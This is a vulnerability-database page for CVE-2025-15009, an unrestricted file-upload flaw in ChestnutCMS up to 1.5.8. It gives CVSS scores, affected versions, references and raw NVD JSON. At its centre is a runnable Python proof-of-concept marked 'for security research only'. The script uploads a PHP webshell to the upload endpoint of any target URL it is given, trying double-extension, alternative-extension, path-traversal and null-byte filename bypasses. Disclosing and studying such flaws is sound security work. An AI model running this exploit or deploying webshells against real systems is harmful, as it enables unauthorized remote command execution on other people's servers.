CVE-2025-15009

Description

A flaw has been found in liweiyi ChestnutCMS up to 1.5.8. This vulnerability affects the function FilenameUtils.getExtension of the file /dev-api/common/upload of the component Filename Handler. Executing manipulation of the argument File can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:1000mz:chestnutcms:*:*:*:*:*:*:*:* - VULNERABLE

liweiyi ChestnutCMS <= 1.5.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15009 PoC - ChestnutCMS Arbitrary File Upload
# Target: ChestnutCMS <= 1.5.8
# Endpoint: /dev-api/common/upload

def exploit(target_url, filename='shell.php'):
    """
    Exploit for CVE-2025-15009
    This PoC demonstrates arbitrary file upload via manipulated filename
    """
    
    # Malicious PHP webshell content
    webshell_content = '<?php system($_GET["cmd"]); ?>'
    
    # Prepare the malicious file
    files = {
        'file': (filename, webshell_content, 'image/jpeg')
    }
    
    # Alternative filename bypass techniques
    bypass_filenames = [
        'shell.php',           # Direct PHP upload
        'shell.php.jpg',       # Double extension bypass
        'shell.php5',          # Alternative extension
        '../shell.php',        # Path traversal attempt
        'shell.php%00.jpg',    # Null byte injection
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-15009...")
    
    for fname in bypass_filenames:
        files['file'] = (fname, webshell_content, 'image/jpeg')
        
        try:
            # Send the malicious upload request
            response = requests.post(
                f"{target_url}/dev-api/common/upload",
                files=files,
                timeout=10
            )
            
            # Check if upload was successful
            if response.status_code == 200:
                print(f"[+] Upload successful with filename: {fname}")
                print(f"[+] Response: {response.text}")
                return True
                
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            
    print("[-] Exploitation failed")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15009.py <target_url>")
        print("Example: python cve-2025-15009.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15009
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15009
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15009/
[4] VulDB https://vuldb.com/cve/CVE-2025-15009
[5] https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md
[6] https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md#vulnerability-proof
[7] https://vuldb.com/?ctiid.337715
[8] https://vuldb.com/?id.337715
[9] https://vuldb.com/?submit.719590

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15009", "sourceIdentifier": "[email protected]", "published": "2025-12-22T03:15:47.310", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in liweiyi ChestnutCMS up to 1.5.8. This vulnerability affects the function FilenameUtils.getExtension of the file /dev-api/common/upload of the component Filename Handler. Executing manipulation of the argument File can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:1000mz:chestnutcms:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.8", "matchCriteriaId": "904EAEE8-81A3-4861-9F47-42350AD1AAED"}]}]}], "references": [{"url": "https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/yuccun/CVE/blob/main/ChestnutCMS-Arbitrary_File_Upload.md#vulnerability-proof", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337715", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337715", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.719590", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}